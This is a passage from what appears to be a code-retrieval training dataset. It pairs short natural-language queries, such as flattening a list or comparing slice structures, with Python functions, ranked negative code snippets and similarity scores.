1):\n raise ValueError(\n \"`strides > 1` not supported in conjunction with `dilation_rate > 1`. 
\"\n f\"Received: strides={strides} and dilation_rate={dilation_rate}\")\n return strides, dilation_rate", "def divide_with_stride(arr: np.ndarray) -> List[np.ndarray]:\n\n result_list: List[np.ndarray] = []\n # slice by z axis\n for z in range(0, z_len := arr.shape[0], 16):\n if z + 31 >= z_len:\n z = z_len - 16\n z_arr: np.ndarray = arr[z:z+16]\n\n # slice by y axis\n for y in range(0, y_len := arr.shape[1], 16):\n y_arr: np.ndarray = z_arr[:, y:y+16]\n\n # slice by x axis\n for x in range(0, x_len := arr.shape[2], 16):\n x_arr: np.ndarray = y_arr[:, :, x:x+16]\n if len(set(x_arr.shape)) == 1 and x_arr.shape[0] == 16:\n result_list.append(x_arr)\n \n return result_list", "def conv_output_shape(\n h_w: Tuple[int, int],\n kernel_size: int = 1,\n stride: int = 1,\n pad: int = 0,\n dilation: int = 1,\n ):\n h = floor(\n ((h_w[0] + (2 * pad) - (dilation * (kernel_size - 1)) - 1) / stride) + 1\n )\n w = floor(\n ((h_w[1] + (2 * pad) - (dilation * (kernel_size - 1)) - 1) / stride) + 1\n )\n return h, w", "def out_stride(self):\n return 4", "def get_strides(onnx_node): # type: (NodeWrapper) -> Tuple[int, int, int]\n str_h, str_w, str_d = 1, 1, 1 # default values\n strides = onnx_node.get_attribute_value('strides', ()) # stride along each axis\n\n if len(strides) == 2: # ONNX input axes order NCHW\n str_h, str_w = strides\n elif len(strides) == 3: # ONNX input axes order NCHWD\n str_h, str_w, str_d = strides\n\n return str_h, str_w, str_d", "def get_conv_rows_cols(height, width):\n dims = [height, width]\n for i in range(len(dims)):\n # (3, 3) zeropad\n dims[i] += 6\n for filter_size in [7, 3, 1, 1]:\n # all strides use valid padding, formula is (W - F + 2P) / S + 1\n dims[i] = (dims[i] - filter_size) // 2 + 1\n\n return dims", "def contiguousInds(args):\n condition = (np.array(args) > 0.0)\n\n # Find the indicies of changes in ``condition``\n dd = np.diff(condition)\n idx, = dd.nonzero()\n\n # Start things after change in ``condition``, thus shift indices 1 rightward\n idx += 1\n\n # If the start is True prepend a 0\n if condition[0]: idx = np.r_[0, idx]\n\n # If the end is True, append the length of the array\n if condition[-1]: idx = np.r_[idx, condition.size]\n\n # Reshape the result into two columns\n idx.shape = (-1, 2)\n\n # Find lengths of each contiguous segment\n sizes = np.diff(idx, axis=1)\n # Find the location of maximum segment length\n maxPos = np.argmax(sizes)\n # Make indices spanning longest segment\n inds = np.arange(*idx[maxPos])\n\n return inds", "def calc_pad_dims_1D(X_shape, l_out, kernel_width, stride, dilation=0, causal=False):\n\tif not isinstance(X_shape, tuple):\n\t\traise ValueError(\"X_shape must be type tuple\")\n\n\tif not isinstance(l_out, int):\n\t\traise ValueError(\"l_out must be type int\")\n\n\tif not isinstance(kernel_width, int):\n\t\traise ValueError(\"kernel_width must be type int\")\n\n\tif not isinstance(stride, int):\n\t\traise ValueError(\"stride must be type int\")\n\n\td = dilation\n\tfw = kernel_width\n\tn_ex, l_in, in_ch = X_shape\n\n\t# update effective filter shape based on dilation factor\n\t_fw = fw * (d + 1) - d\n\ttotal_pad = int((stride * (l_out - 1) + _fw - l_in))\n\n\tif not causal:\n\t\tpw = total_pad // 2\n\t\tl_out1 = int(1 + (l_in + 2 * pw - _fw) / stride)\n\n\t\t# add asymmetric padding pixels to right / bottom\n\t\tpw1, pw2 = pw, pw\n\t\tif l_out1 == l_out - 1:\n\t\t\tpw1, pw2 = pw, pw + 1\n\t\telif l_out1 != l_out:\n\t\t\traise AssertionError\n\n\tif causal:\n\t\t# if this is a causal convolution, only pad the left side of \n\t\t# 
the sequence\n\t\tpw1, pw2 = total_pad, 0\n\t\tl_out1 = int(1 + (l_in + total_pad - _fw) / stride)\n\t\tassert l_out1 == l_out\n\n\tif any(np.array([pw1, pw2]) < 0):\n\t\traise ValueError(\"padding cannot be less than 0, Got: {}\".\\\n\t\t\tformat((pw1, pw2)))\n\treturn (pw1, pw2)", "def same_nd(shape, stride, kernel_size):\n\n rshape = []\n for sh, st, sz in zip(shape, stride, kernel_size):\n rshape.append(int(same_x(sh, st, sz)))\n return rshape", "def make_padding(kernel_size, stride, dilation):\n return -((-kernel_size - (kernel_size - 1) * (dilation - 1)) // stride + 1) // 2", "def get_stride(resnet_unit_id, block_id):\n if resnet_unit_id == 0 or block_id != 0:\n return 1\n else:\n return 2", "def conv2d(\n input: np.ndarray,\n weight: np.ndarray,\n bias: np.ndarray = None,\n stride: int = 1,\n padding: int = 0,\n groups: int = 1,\n dilation: int = 0,\n) -> np.ndarray:\n if input.ndim == 3:\n input = np.expand_dims(input, axis=0)\n assert dilation == 0, \"dilation > 0 not supported yet.\"\n assert input.ndim == weight.ndim\n assert weight.shape[1] * groups == input.shape[1]\n if bias is None:\n bias = np.zeros((weight.shape[0],))\n assert weight.shape[0] == bias.shape[0]\n assert weight.shape[2] == weight.shape[3], \"non-equal kernel size not supported\"\n C_out, _, K, _ = weight.shape\n padded_input = np.pad(\n input, ((0, 0), (0, 0), (padding, padding), (padding, padding)), constant_values=0.0\n )\n N, C_in, H, W = padded_input.shape\n C_in_grp = C_in // groups # C_in group size\n C_out_grp = C_out // groups # C_out group size\n out = []\n for g in range(groups):\n input_g = padded_input[:, g * C_in_grp : (g + 1) * C_in_grp]\n weight_g = weight[g * C_out_grp : (g + 1) * C_out_grp, ...]\n bias_g = bias[g * C_out_grp : (g + 1) * C_out_grp]\n out_g = np.zeros((N, C_out_grp, (H - K + 1) // stride, (W - K + 1) // stride))\n for i in range((H - K + 1) // stride):\n for j in range((W - K + 1) // stride):\n si, sj = stride * i, stride * j\n input_block = input_g[:, None, :, si : si + K, sj : sj + K]\n out_g[:, :, i, j] = (input_block * weight_g).reshape(N, C_out_grp, -1).sum(\n axis=2\n ) + bias_g[None, :]\n out.append(out_g)\n return np.concatenate(out, axis=1)" ]
[ "0.6671998", "0.6667623", "0.63901645", "0.62995565", "0.6209812", "0.62079126", "0.6108434", "0.60595614", "0.60080725", "0.5996222", "0.5996222", "0.5860129", "0.57919973", "0.57440704", "0.56975204", "0.56885684", "0.56631756", "0.5634464", "0.56175673", "0.5605618", "0.55762684", "0.5570212", "0.55302495", "0.55226046", "0.5513745", "0.55130106", "0.5503428", "0.5492651", "0.54516816", "0.5423718" ]
0.6674238
0
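The padding arithmetic quoted in the negatives above (`compute_conv`, `_get_same_padding_conv_nd`) can be checked numerically. A minimal sketch under the usual convolution conventions; the helper names `conv_out_len` and `same_pad_1d` are illustrative and not part of the corpus:

import math

def conv_out_len(in_size, kernel, stride=1, pad=0, dilation=1):
    # standard output-length formula with an effective (dilated) kernel
    eff_k = dilation * (kernel - 1) + 1
    return (in_size + 2 * pad - eff_k) // stride + 1

def same_pad_1d(in_size, kernel, stride=1, dilation=1):
    # TensorFlow-style "same" padding, split into (left, right)
    eff_k = dilation * (kernel - 1) + 1
    total = max((math.ceil(in_size / stride) - 1) * stride + eff_k - in_size, 0)
    return total // 2, total - total // 2

left, right = same_pad_1d(28, kernel=3, stride=2)
# with the asymmetric pad applied, the output length equals ceil(28 / 2)
assert conv_out_len(28 + left + right, kernel=3, stride=2) == math.ceil(28 / 2)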
flatten list or return scalar
def flatten(lst):
    if atomp(lst):  # scalar
        return lst
    return _flatten(lst)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lflatten(*lst):\n return flatten(list(lst))", "def _flatten_one(x):\n return x[0] if is_iterable(x) else x", "def flatten(x): # przerobić na lambda?\n if x==[]:\n return None\n else:\n return x[0]", "def flatten():", "def flatten(lst):\n if atomp(lst):\n return lst\n return _flatten(lst)", "def list_flatten(input_list):\n if len(input_list) > 0 and isinstance(input_list[0], (list, np.ndarray)):\n return functools.reduce(operator.iconcat, input_list, [])\n\n return input_list", "def flatten(lst):\n \"*** YOUR CODE HERE ***\"", "def do_flatten(obj):\n if type(obj) == list:\n return np.array(obj).flatten()\n return obj.flatten()", "def flatten(ls):\n return sum(ls, [])", "def flatten(vec):\n return [ [v for v in z] for z in vec][0]", "def _flatten_list(x):\n return list(chain.from_iterable(x))", "def flatten(items):\n if isinstance(items, (numbers.Number, six.string_types)):\n return items\n return list(lazy_flatten(items))", "def flatten_list(alist):\n return list(flatten_list_gen(alist))", "def flatten(self):\n if self.data:\n def flat(l):\n ans=[]\n for i in l:\n if type(i)==list:\n ans.extend(flat(i))\n else:\n ans.append(i)\n return ans\n return flat(self.data)\n else:\n return []", "def flatten(*args):\n return _flatten(args)", "def flatten_list(result_set):\n return sum(list(result_set), [])", "def flatten(list):\n\n if isinstance(list, collections.Iterable) and not isinstance(list, (str, bytes)):\n return [a for i in list for a in flatten(i)]\n else:\n return [list]", "def flatten(xss):\n return chain.from_iterable(xss)", "def flatten(nested_list):\r\n return list(chain.from_iterable(nested_list))", "def flatten(lst):\n assert (isinstance(lst, list)), \"Argument must be an list\"\n\n for i in lst:\n \t# print(i)\n \tif type(i) == list:\n \t\tflatten(i)\n \telse:\n \t\tuniversal_lst.append(i)\n return universal_lst", "def flatten(lst):\n out = []\n for v in lst:\n if v is None: continue\n if isinstance(v, list):\n out.extend(flatten(v))\n else:\n out.append(v)\n return out", "def fast_flatten(items):\n if isinstance(items, (numbers.Number, six.string_types)):\n return items\n\n try:\n items = convert_tensor_to_numpy(items)\n except Exception:\n LOGGER.debug(\"unable to convert tensor; continuing\", exc_info=True)\n\n if HAS_NUMPY:\n try:\n # Vector, Matrix conversion:\n items = numpy.array(items, dtype=float)\n # Return numpy array:\n return items.reshape(-1)\n except Exception:\n try:\n # Uneven conversion, 2 deep:\n items = numpy.array([numpy.array(item) for item in items], dtype=float)\n return items.reshape(-1)\n except Exception:\n # Fall through\n LOGGER.debug(\n \"numpy unable to convert items in fast_flatten\", exc_info=True\n )\n return numpy.array(flatten(items))\n else:\n log_once_at_level(\n logging.INFO, \"numpy not installed; using a slower flatten\",\n )\n return flatten(items)", "def _flatten(x: Sequence) ->list:\n return [item for sublist in x for item in sublist]", "def test_scalar(self) -> None:\n result = flatten('xyz')\n self.assertEqual(result, ['xyz'], result)", "def flatten(box: list) -> list:\n if len(box) == 1:\n result = flatten(box[0]) if type(box[0]) == list else box\n elif type(box[0]) == list:\n result = flatten(box[0]) + flatten(box[1:])\n else:\n result = [box[0]] + flatten(box[1:])\n return result", "def flatten(llst):\n res = []\n for lst in llst:\n res += lst\n return res", "def _flatten_list(input_list: Any) -> List[int]:\n flattened_list = []\n for element in input_list:\n if isinstance(element, list):\n flattened_list += 
_flatten_list(element)\n else:\n flattened_list.append(element)\n return flattened_list", "def flatten(a):\r\n if isinstance(a, (tuple, list, set)):\r\n l = []\r\n for item in a:\r\n l.extend(flatten(item))\r\n return l\r\n else:\r\n return [a]", "def flatten(self) -> List:\n if self.children == []:\n return [self.value]\n else:\n return ([self.value]\n + sum([c.flatten()\n for c in self.children], []))", "def flatten(l: iter):\n return functools.reduce(lambda x, y: x + y, l)" ]
[ "0.7351641", "0.7303014", "0.71548724", "0.7148735", "0.7075203", "0.69926786", "0.6866925", "0.68362427", "0.68152994", "0.6766912", "0.67421544", "0.6731956", "0.66912895", "0.66828746", "0.6666743", "0.6657045", "0.6656961", "0.66309655", "0.66255593", "0.6615", "0.6612183", "0.658197", "0.6566865", "0.65406513", "0.64364433", "0.6419373", "0.6396802", "0.63942176", "0.6364172", "0.63513696" ]
0.83005923
0
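The `flatten` document above depends on `atomp` and `_flatten`, which are outside the entry. A self-contained sketch of the same behaviour, assuming a "scalar" is anything that is not a list:

def flatten(lst):
    # return scalars unchanged; recursively flatten nested lists
    if not isinstance(lst, list):  # stands in for atomp()
        return lst
    out = []
    for item in lst:
        flat = flatten(item)
        if isinstance(flat, list):
            out.extend(flat)
        else:
            out.append(flat)
    return out

assert flatten(42) == 42
assert flatten([1, [2, [3, 4]], 5]) == [1, 2, 3, 4, 5]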
Compare the structure of llst[lslices] and rlst[rslices].
def cmp_structure(llst, rlst, lslices, rslices):
    lshape = slice_shape(llst, lslices)
    rshape = slice_shape(rlst, rslices)
    if (len(lshape) != len(rshape)):
        return -1
    for i in range(len(lshape)):
        if lshape[i] != rshape[i]:
            return -1
        if lshape[i] == 0:
            return 0
    return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cmp_structure(llst, rlst, lslices, rslices):\n lshape = slice_shape(llst, lslices)\n rshape = slice_shape(rlst, rslices)\n if len(lshape) != len(rshape):\n return -1\n for i in range(len(lshape)):\n if lshape[i] != rshape[i]:\n return -1\n if lshape[i] == 0:\n return 0\n return 0", "def compare(self,l):\r\n\t\t\r\n\t\t# assume equality\r\n\t\tq = True\r\n\t\t\r\n\t\t# test term by term\r\n\t\tfor i,j in zip(self,l):\r\n\t\t\t\r\n\t\t\t# break at first mismatch\r\n\t\t\tif not i.compare(j):\r\n\t\t\t\tq = False\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\t\t# make sure lengths are also equal\r\n\t\tif len(self) != len(l):\r\n\t\t\tq = False\r\n\t\t\t\t\r\n\t\treturn q", "def _compare_list(self, name, actual, expect):\n self.op_test.assertListEqual(\n actual.recursive_sequence_lengths(),\n expect[1],\n \"Output (\" + name + \") has different lod at \" + str(place),\n )", "def test_align_lst_shapes_equal():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n test_uv_2 = copy.deepcopy(test_uv)\n ra_range = [0, 12]\n\n test_uv_out, test_uv_2_out = utils.lst_align(\n test_uv,\n test_uv_2,\n ra_range=ra_range,\n inplace=False,\n )\n\n assert test_uv_out.time_array.shape == test_uv_out.time_array.shape", "def wvlsort(self,s,irrad):\n iwvls = self.iwvls\n if sorted(iwvls) is iwvls:\n print( '*** wvls are already sorted, there may be a problem! ***')\n if 'sp' in s:\n if self.verbose: print( 'in sp')\n if self.verbose: print( s['sp'].shape)\n ui = [i for i in range(s['sp'].ndim) if s['sp'].shape[i] == len(self.wvl)]\n if 1 in ui:\n sp = s['sp'][:,iwvls,:,:,:]\n else: \n raise LookupError\n if 'rads' in s:\n if self.verbose: print( 'in rads')\n if self.verbose: print( s['rads'].shape, s['rads'].ndim, len(iwvls))\n ui = [i for i in range(s['rads'].ndim) if s['rads'].shape[i] == len(self.wvl)]\n #print ui\n if 1 in ui:\n if self.verbose: print( '1 in ui')\n sp = s['rads'][:,iwvls]\n else: \n if self.verbose: print( 'not 1 in ui')\n sp = s['rads'][iwvls,:]\n if 'iset' in s:\n if s['iset'].ndim>1:\n self.iset = s['iset'][:,0]\n else:\n self.iset = s['iset']\n else:\n print( '** Problem, rads present (radiance subset), but not the subset integers **')\n elif 'rad' in s:\n if self.verbose: print( 'in rad')\n if self.verbose: print( s['rad'].shape, s['rad'].ndim, len(iwvls))\n ui = [i for i in range(s['rad'].ndim) if s['rad'].shape[i] == len(self.wvl)]\n #print ui\n if 1 in ui:\n if self.verbose: print( '1 in ui')\n sp = s['rad'][:,iwvls]\n else: \n if self.verbose: print( 'not 1 in ui')\n sp = s['rad'][iwvls,:]\n self.iset = np.where(s['rad'][:,0])[0]\n if irrad:\n if self.verbose: print( 'in irrad')\n ui = [i for i in range(s['sp_irrdn'].ndim) if s['sp_irrdn'].shape[i] == len(self.wvl)]\n if 1 in ui:\n self.sp_irrdn = s['sp_irrdn'][:,iwvls,:,:,:]\n self.sp_irrup = s['sp_irrup'][:,iwvls,:,:,:]\n else: \n raise LookupError\n self.sp = sp", "def test_merge_list_same(short_ll, small_ll):\n assert ml(short_ll, small_ll) == 8\n assert len(small_ll) == 8", "def compareIndexes(rrs,ccs,rrOlds,ccOlds):\n\n # create a better way of doing this\n #newArr = np.vstack([rr,cc])\n #oldArr = np.vstacl([rrOld,ccOld])\n\n iterCount = 0\n toDelete = []\n\n for rr, cc in zip(rrs,ccs):\n for rrOld, ccOld in zip(rrOlds,ccOlds):\n if rr == rrOld and cc == ccOld:\n toDelete.append(iterCount)\n break\n\n iterCount += 1\n\n\n rrMod = np.delete(rrs,toDelete)\n ccMod = np.delete(ccs,toDelete)\n\n return rrMod, ccMod, toDelete", "def entitycompare(l, r):\n l = 
l.file.split(b'/')\n r = r.file.split(b'/')\n nl = len(l)\n nr = len(r)\n n = min(nl, nr)\n for i in range(n):\n if i + 1 == nl and nl < nr:\n return -1\n elif i + 1 == nr and nl > nr:\n return +1\n elif l[i] < r[i]:\n return -1\n elif l[i] > r[i]:\n return +1\n return 0", "def has_match(trajs_0, trajs_1):\n for i in range(len(trajs_0)):\n for j in range(len(trajs_1)):\n R = (trajs_0[i].get_slice()[:,:2] == trajs_1[j].get_slice()[:,:2])\n if isinstance(R, bool):\n if R:\n return True \n elif R.all():\n return True \n else:\n pass \n return False", "def checkLists(self, l1, l2):\n self.assertListEqual(sorted(l1), sorted(l2))", "def _compare_list(self, name, actual, expect):\n with fluid.dygraph.base.guard(place=place):\n self.op_test.assertListEqual(\n actual.value()\n .get_tensor()\n .recursive_sequence_lengths(),\n expect[1],\n \"Operator (\"\n + self.op_type\n + \") Output (\"\n + name\n + \") has different lod at \"\n + str(place)\n + \" in dygraph mode\",\n )", "def almostEqualList(self, l1:List[float], l2:List[float], margin:float):\r\n ret = False\r\n for i in range(0,len(l1)):\r\n diff = abs(l1[i] - l2[i])\r\n if diff < margin:\r\n ret = True\r\n else:\r\n return False\r\n return ret", "def __le__(self, other):\n if type(self) is not type(other) or len(self) != len(other):\n raise TypeError(\"these are not comparable\")\n if self.runs == other.runs:\n return True\n\n # r1 must have less runs than r0\n if len(other.runs) > len(self.runs):\n return False\n\n dico1 = other.run_indices\n\n # conversion: index of run in r0 -> index of run in r1\n dico0 = [None] * len(self.runs)\n for i, bloc in enumerate(self.runs):\n j0 = dico1[bloc[0]]\n for k in bloc:\n if dico1[k] != j0:\n return False\n dico0[i] = j0\n\n # at this point, the set partitions given by tuples are comparable\n dg0 = self.spg\n dg1 = other.dpg\n\n for i, j in dg0.edge_iterator(labels=False):\n if dico0[i] != dico0[j] and not dg1.has_edge(dico0[i], dico0[j]):\n return False\n return True", "def _compare_structure(sample, reference):\n paths = MappingValidator._find_all_paths(reference)\n result = True\n for path in paths:\n result = result and MappingValidator._validate_key(sample, path)\n if not result:\n break\n return result", "def compare(self):\n len0 = len(self.cluster_lists[0])\n len1 = len(self.cluster_lists[1])\n longer_index = 0 if len0 >= len1 else 1\n shorter_index = 1 if len1 <= len0 else 0\n self.stars_length = len(self.cluster_lists[shorter_index]) \n self.starlets_length = len(self.cluster_lists[longer_index]) \n # build the noeds for shorter cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[shorter_index]:\n len_spectra = len(cluster.get_spectra())\n star = ClusterNode(cluster.id, len_spectra) \n self.stars[cluster.id] = star\n\n self.cluster_spectra_num[shorter_index] += len_spectra\n self.cluster_size_dist[shorter_index][len_spectra] = self.cluster_size_dist[shorter_index].get(len_spectra,0) + 1\n # build the noeds for longer cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[longer_index]:\n len_spectra = len(cluster.get_spectra())\n starlet = ClusterNode(cluster.id, len_spectra) \n self.starlets[cluster.id] = starlet\n\n self.cluster_spectra_num[longer_index] += len_spectra\n self.cluster_size_dist[longer_index][len_spectra] = self.cluster_size_dist[longer_index].get(len_spectra,0) + 1\n # do the comparing, and network building\n for i in range (0, len(self.cluster_lists[shorter_index])):\n cluster0 = 
self.cluster_lists[shorter_index][i] \n for j in range (i, len(self.cluster_lists[longer_index])):\n cluster1 = self.cluster_lists[longer_index][j] \n (shared_spec_num, similarity) = self.calculate_similarity(cluster0, cluster1)\n if similarity == 0:\n continue\n self.similarity_dist[int(similarity*10)] = self.similarity_dist.get(int(similarity*10),0) + 1\n self.shared_spec_num += shared_spec_num\n\n self.stars[cluster0.id].add_nb_node(cluster1.id, similarity, shared_spec_num)\n self.starlets[cluster1.id].add_nb_node(cluster0.id, similarity, shared_spec_num)\n\n self.ave_star_size = self.cluster_spectra_num[shorter_index]/self.stars_length\n self.ave_starlet_size = self.cluster_spectra_num[longer_index]/self.starlets_length", "def test_read_multiple_lxyrs(self):\n cwd = os.path.dirname(os.path.abspath(__file__))\n test_dir = os.path.join(cwd, 'test_files/')\n ground_truths = read_lxyrs(test_dir)\n self.assertEquals(len(ground_truths), 3)\n self.assertEquals(len(ground_truths['test1']), 3)\n self.assertEquals(len(ground_truths['test_gt']), 2)", "def _compare_nested_sequences(seq1, seq2):\n return all([(l == m).all() for l, m in zip(seq1, seq2)])", "def test_len(self):\n\t\t# for 2 sample lists, I test that the len of the list is the len\n\t\t# of the LinkedList that is constructed with the list.\n\t\tl1 = [1]\n\t\tself.assertEqual(len(from_list_(l1).print()), len(l1))\n\t\tl2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\n\t\tself.assertEqual(len(from_list_(l2).print()), len(l2))", "def lcmt_check(grade_list_idx, grade_list_i, grade_list_j):\n return grade_list_idx == (grade_list_j - grade_list_i)", "def compare_data_info(lst):\n\n # Check data information is the same across the list of given objects\n for ind, f_obj in enumerate(lst[:-1]):\n if get_data_info(f_obj) != get_data_info(lst[ind+1]):\n return False\n\n # If no data info comparisons fail, return that objects have consistent information\n return True", "def check_shapes(arrs):\r\n shps = [i.shape for i in arrs]\r\n eq = np.all(np.array([shps[0] == i for i in shps[1:]]))\r\n err = \"Arrays arr not of the same shape...\"\r\n if not eq:\r\n raise ValueError(\"{}\\n{}\".format(err, shps))", "def seg_bound_comparison(orig_label_path, seg_data_path, bound_data_2d_path, bound_data_3d_path, fig_save_dir, sample_stack_rows=50):\n\n for sample in os.listdir(seg_data_path):\n if not sample.startswith('.') and osp.isdir(osp.join(seg_data_path, sample)):\n sample_path = osp.join(seg_data_path, sample)\n for artery in os.listdir(sample_path):\n orig_label_pick_path = osp.join(orig_label_path, sample, artery, 'data.pkl')\n seg_pick_path = osp.join(seg_data_path, sample, artery, 'data.pkl')\n bound_2d_pick_path = osp.join(bound_data_2d_path, sample, artery, 'data.pkl')\n bound_3d_pick_path = osp.join(bound_data_3d_path, sample, artery, 'data.pkl')\n artery_save_dir = osp.join(fig_save_dir, sample, artery)\n\n if not osp.exists(artery_save_dir):\n os.makedirs(artery_save_dir)\n\n # load original segmentation label\n with open(orig_label_pick_path, 'rb') as reader:\n labels_gt = pickle.load(reader)['label']\n\n with open(seg_pick_path, 'rb') as reader:\n data_seg = pickle.load(reader)\n # inputs_seg here is a list of length 1 (not modified yet)\n inputs_seg, labels_seg, preds_seg = data_seg['input'], data_seg['label'], data_seg['pred']\n start, n_class, width = data_seg['start'], data_seg['n_class'], data_seg['width']\n\n with open(bound_2d_pick_path, 'rb') as reader:\n data_bound = pickle.load(reader)\n # inputs_bound here is a list of length 1 (not modified 
yet)\n inputs_bound_2d, labels_bound_2d, preds_bound_2d, outputs_bound_2d = \\\n data_bound['input'], data_bound['label'], data_bound['pred'], data_bound['output']\n\n with open(bound_3d_pick_path, 'rb') as reader:\n data_bound = pickle.load(reader)\n # inputs_bound here is a list of length 1 (not modified yet)\n inputs_bound_3d, labels_bound_3d, preds_bound_3d, outputs_bound_3d = data_bound['input'], \\\n data_bound['label'], data_bound['pred'], data_bound['output']\n\n print(\"# of slices in total: {}\".format(len(inputs_seg[0]))) # number of slices\n\n for inx in range(0, len(inputs_seg[0]), sample_stack_rows):\n over = min(inx + sample_stack_rows, len(inputs_seg[0]))\n input_plot, label_gt_plot, label_bound_2d_plot, pred_seg_plot, pred_bound_2d_plot, pred_bound_3d_plot\\\n = inputs_seg[0][inx:over], labels_gt[inx:over], labels_bound_2d[inx:over], preds_seg[inx:over], \\\n preds_bound_2d[inx:over], preds_bound_3d[inx:over]\n\n # for result check\n print(\"input: {}, label_seg: {}, label_bound_2d: {}, pred_seg: {}, pred_bound_2d: {}, pred_bound_3d: {}\".format(\n input_plot.shape, label_gt_plot.shape, label_bound_2d_plot.shape, pred_seg_plot.shape, pred_bound_2d_plot.shape,\n pred_bound_3d_plot.shape))\n\n data_list = [{\"input\": input, \"GT_seg\": label_seg, \"pred_seg\": pred_seg, \"GT_bound\": label_bound, \"pred_2d_bound\": pred_bound_2d,\n \"pred_3d_bound\" : pred_bound_3d} for (input, label_seg, pred_seg, label_bound, pred_bound_2d, pred_bound_3d)\n in zip(input_plot, label_gt_plot, pred_seg_plot, label_bound_2d_plot, pred_bound_2d_plot, pred_bound_3d_plot)]\n\n # print(\"# of slices in batch: {}\".format(len(data_list)))\n file_name = \"{}/{:03d}\".format(artery_save_dir, inx + start)\n\n plot_seg_bound_comparison(data_list, rows=over - inx, start_with=0, show_every=1, start_inx=inx + start,\n n_class=n_class, fig_name=file_name, width=width, scale=4)", "def test_collect_lsubrs_called_from(self):\n\n g1 = pyCompressor.CandidateSubr(3, (0, 10))\n g1._global = True\n g2 = pyCompressor.CandidateSubr(3, (0, 20))\n g2._global = True\n g3 = pyCompressor.CandidateSubr(3, (0, 30))\n g3._global = True\n l1 = pyCompressor.CandidateSubr(3, (0, 40))\n l1._global = False\n l2 = pyCompressor.CandidateSubr(3, (0, 50))\n l2._global = False\n l3 = pyCompressor.CandidateSubr(3, (0, 60))\n l3._global = False\n\n g1._encoding = [(3, l1)]\n g2._encoding = [(3, l2), (6, g3)]\n g3._encoding = []\n l1._encoding = []\n l2._encoding = [(3, l3)]\n l3._encoding = []\n\n lsubrs = self.empty_compreffor.collect_lsubrs_called_from([g1, g2, g3])\n self.assertSetEqual(lsubrs, {l1, l2, l3})", "def is_lili_subset(sub_lili, full_lili):\n if len(sub_lili) != len(full_lili):\n warnings.warn(\"Inputs should have same length\")\n for i, li in enumerate(sub_lili):\n if len(li) > 0 and not set(li).issubset(set(full_lili[i])):\n return False\n return True", "def _compare_survey_structures(self, db_structure, local_structure):\n if not local_structure.equals(db_structure):\n self.log.info(f\"Survey structure data is not consistent with the table in the db\")\n return False\n else:\n return True", "def test_merge_list(short_ll, long_ll):\n assert ml(short_ll, long_ll) == 8\n assert len(long_ll) == 10", "def compare(self, *args):\n return _ida_hexrays.lvar_locator_t_compare(self, *args)", "def compare_sites(ind1, ind2, cns_t, samples, samples_nmode1, samples_nmode2, cnmode1, cnmode2, samples_lq1, samples_lq2, subtract_lq = True):\n data = []\n\n \n ids = [ind1, ind2]\n ids_mod = [\"_\".join(i.split('_')[:-1]) for i in ids]\n 
\n \n cns_1 = cns_t[ind1].to_dict()\n cns_2 = cns_t[ind2].to_dict()\n \n \n samples_nmode1 = [i for i in samples if cns_1[i] != cnmode1]\n samples_nmode2 = [i for i in samples if cns_2[i] != cnmode2]\n samples_to_compare = set(samples_nmode1 + samples_nmode2)\n if subtract_lq:\n # exclude LQ samps\n samples_to_exclude = set(samples_lq1 + samples_lq2)\n samples_to_compare_nmode = list(samples_to_compare.difference(samples_to_exclude))\n \n samples_to_compare_nmode = list(samples_to_compare.difference(samples_to_exclude))\n samples_to_compare_corr = list(set(samples).difference(samples_to_exclude))\n \n else: \n samples_to_compare_corr = samples\n samples_nmode1 = [i for i in samples if cns_1[i] != cnmode1]\n samples_nmode2 = [i for i in samples if cns_2[i] != cnmode2]\n samples_to_compare_nmode = list(set(samples_nmode1 + samples_nmode2))\n samples_to_exclude = []\n \n cns_nmode_1 = [int(cns_1[i]) for i in samples_to_compare_nmode]\n cns_nmode_2 = [int(cns_2[i]) for i in samples_to_compare_nmode]\n\n cns_corr_1 = [int(cns_1[i]) for i in samples_to_compare_corr]\n cns_corr_2 = [int(cns_2[i]) for i in samples_to_compare_corr]\n \n allele_dist1 = dict(Counter(cns_corr_1))\n allele_dist2 = dict(Counter(cns_corr_2))\n \n corr_coef = stats.pearsonr(cns_corr_1, cns_corr_2)[0]\n \n nsamp = len(samples_to_compare_nmode)\n nsamp_pass = len(samples_to_compare_corr)\n\n num_diff = compare_lists(cns_nmode_1, cns_nmode_2)\n alleles = set(cns_corr_1 + cns_corr_2)\n \n alleles1 = set(cns_corr_1)\n num_alleles1 = len(alleles1)\n alleles2 = set(cns_corr_2)\n num_alleles2 = len(alleles2)\n\n mean_diff_all = calculate_absolute_mean_diff(cns_corr_1, cns_corr_2)\n mean_diff_nmode = calculate_absolute_mean_diff(cns_nmode_1, cns_nmode_2)\n \n exact_match = (cns_corr_1 == cns_corr_2)\n\n \n try:\n perc_diff = num_diff/nsamp\n except:\n# print nsamp, 'nsamp is zero'\n perc_diff = 0\n\n out = [ind1, ind2, corr_coef, num_diff, nsamp, \n perc_diff, samples_to_compare_nmode, samples_to_compare_corr, \n list(samples_to_exclude), nsamp_pass, exact_match, mean_diff_all, mean_diff_nmode, \n alleles1, alleles2, num_alleles1, num_alleles2, allele_dist1, allele_dist2]\n\n return out", "def __compare(self,data,dataout):\n if(data == None or dataout == None):\n return False\n if(len(data) != len(dataout)):\n return False\n for i in range(len(data)):\n if(data[i] != dataout[i]):\n return False\n return True", "def read_pairwise_ld(snp1, snp2):\n\tif snp1.rsID == snp2.rsID:\n\t\treturn 1\n\tif snp1.rsID in r2_cache and snp2.rsID in r2_cache:\n\t\treturn r2_cache[snp1.rsID][snp2.rsID]\n\telse:\n\t\treturn 0" ]
[ "0.8107347", "0.5830058", "0.5787684", "0.57273674", "0.5708086", "0.547884", "0.54676497", "0.5341118", "0.53267294", "0.5325244", "0.5295086", "0.52857417", "0.52715236", "0.52042264", "0.5128856", "0.50830114", "0.50252223", "0.5011563", "0.50000906", "0.49984854", "0.49905896", "0.49851516", "0.4983977", "0.49804145", "0.49787208", "0.49598733", "0.49352184", "0.491702", "0.4916425", "0.4909734" ]
0.8097147
1
